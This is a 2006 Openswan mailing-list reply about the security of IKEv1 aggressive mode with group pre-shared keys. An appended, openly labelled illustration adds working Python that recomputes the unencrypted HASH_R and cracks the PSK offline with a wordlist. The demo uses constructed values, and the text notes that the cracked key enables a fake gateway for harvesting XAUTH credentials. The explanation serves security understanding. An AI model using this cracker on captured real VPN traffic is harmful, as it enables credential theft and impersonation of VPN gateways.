[Openswan Users] Aggressive mode, NAT-T, destination behind NAT

Brian Candler B.Candler at pobox.com
Thu Apr 13 08:11:25 CEST 2006


On Wed, Apr 12, 2006 at 10:32:22PM +0200, Paul Wouters wrote:
> > > aggressive mode is supported, though strongly discouraged for security
> > > reasons.
...
> > When using a group pre-shared key, the fact that someone could learn that
> > the group is called "foo" is not always a major concern.
> 
> It is, because when used with PSK, anyone who knows the groupPSK can pretend
> to be your VPN gateway, and then you happily present your XAUTH user/password
> to them.

To which I'd comment:

1. Doesn't that apply to Main Mode with PSK too?

2. With Main Mode and dynamic IP (road warrior), you have to use a single PSK
for your entire client base. With Aggressive Mode you can use a different
PSK per user or user group. So in that case, Aggressive Mode is better.

3. If you have a private key and certificate, in many cases you can still
also perform a MITM attack. (For example, with Windows clients, they do not
check that the hostname they connect to matches the one in the certificate,
so any client certificate can also be used to spoof the server)

Regards,

Brian.
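
The concrete reason aggressive mode with a group PSK is discouraged, as an added illustration that is not part of the original thread or of Openswan's code: in IKEv1 aggressive mode the responder's HASH_R goes out in message 2 unencrypted, and every other input to it (KE values, nonces, cookies, SA body, responder ID) is also visible in messages 1 and 2, so a passive capture is enough for an offline dictionary attack on the PSK (RFC 2409 section 5.1 formulas, HMAC-SHA1 as prf). In main mode the same hashes travel in messages 5 and 6 encrypted under SKEYID_e, so a sniffer has nothing to test candidates against. All field values, the wordlist and the SA payload body below are constructed for the demo; only the prf, the hash layout and the group 2 prime are from the RFC.

```python
import hashlib
import hmac


def prf(key: bytes, data: bytes) -> bytes:
    """HMAC-SHA1 is the prf for an IKE SA negotiated with SHA-1 (RFC 2409 sec. 5)."""
    return hmac.new(key, data, hashlib.sha1).digest()


# RFC 2409 Appendix A, group 2: 1024-bit MODP prime with generator 2.
MODP1024_P = int(
    "FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74"
    "020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F1437"
    "4FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED"
    "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF", 16)
MODP1024_G = 2


def ke(x: int) -> bytes:
    """Public DH value g^x mod p as the 128-byte KE payload body."""
    return pow(MODP1024_G, x, MODP1024_P).to_bytes(128, "big")


def id_fqdn(name: str) -> bytes:
    """ID payload body (minus generic header): ID_FQDN type 2, proto 0, port 0, name."""
    return b"\x02\x00\x00\x00" + name.encode()


def aggressive_mode_capture(psk, xi, xr, ni, nr, cky_i, cky_r, sai_b, idii_b, idir_b):
    """Everything a passive sniffer sees in aggressive mode messages 1 and 2.

    Message 1: HDR, SA, KE, Ni, IDii      (initiator, cleartext)
    Message 2: HDR, SA, KE, Nr, IDir, HASH_R (responder, cleartext)
    The PSK itself never crosses the wire, but HASH_R is a MAC over
    cleartext fields keyed (via SKEYID) by the PSK alone.
    """
    gxi, gxr = ke(xi), ke(xr)
    skeyid = prf(psk, ni + nr)                      # PSK auth: SKEYID = prf(psk, Ni_b | Nr_b)
    hash_r = prf(skeyid, gxr + gxi + cky_r + cky_i + sai_b + idir_b)
    return {"gxi": gxi, "gxr": gxr, "ni": ni, "nr": nr, "cky_i": cky_i,
            "cky_r": cky_r, "sai_b": sai_b, "idii_b": idii_b, "idir_b": idir_b,
            "hash_r": hash_r}


def hash_r_for(psk: bytes, c: dict) -> bytes:
    """Recompute HASH_R for a candidate PSK from the captured cleartext fields."""
    skeyid = prf(psk, c["ni"] + c["nr"])
    return prf(skeyid, c["gxr"] + c["gxi"] + c["cky_r"] + c["cky_i"]
               + c["sai_b"] + c["idir_b"])


def crack_psk(capture: dict, candidates):
    """Offline dictionary attack: no packets to the gateway, no lockouts, no logs."""
    for cand in candidates:
        if hmac.compare_digest(hash_r_for(cand.encode(), capture), capture["hash_r"]):
            return cand
    return None


# ---- constructed demo values (not a real capture) ----------------------------
DEMO_PSK = b"foo-group-secret"
WORDLIST = ["password", "vpn123", "foo", "foo-group-secret", "changeme"]


def demo_capture() -> dict:
    # Deterministic stand-ins for the private exponents, nonces and cookies.
    xi = int.from_bytes(hashlib.sha256(b"initiator exponent").digest(), "big")
    xr = int.from_bytes(hashlib.sha256(b"responder exponent").digest(), "big")
    ni = hashlib.sha256(b"Ni").digest()[:16]
    nr = hashlib.sha256(b"Nr").digest()[:16]
    cky_i = hashlib.sha256(b"CKY-I").digest()[:8]
    cky_r = hashlib.sha256(b"CKY-R").digest()[:8]
    sai_b = b"\x00\x00\x00\x01" + b"\x00" * 20   # placeholder SA payload body, not a real encoding
    return aggressive_mode_capture(DEMO_PSK, xi, xr, ni, nr, cky_i, cky_r,
                                   sai_b, id_fqdn("roadwarrior"), id_fqdn("foo"))


if __name__ == "__main__":
    cap = demo_capture()
    print("responder ID seen on the wire:", cap["idir_b"][4:].decode())
    print("recovered group PSK:", crack_psk(cap, WORDLIST))
```

The recovered value is the group PSK, which is exactly what an attacker needs to stand up a fake gateway and harvest the XAUTH credentials the client then presents. Per-user PSKs (point 2 above) limit the blast radius of one cracked key but do not change the cracking cost, which is bounded only by how guessable the secret is.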

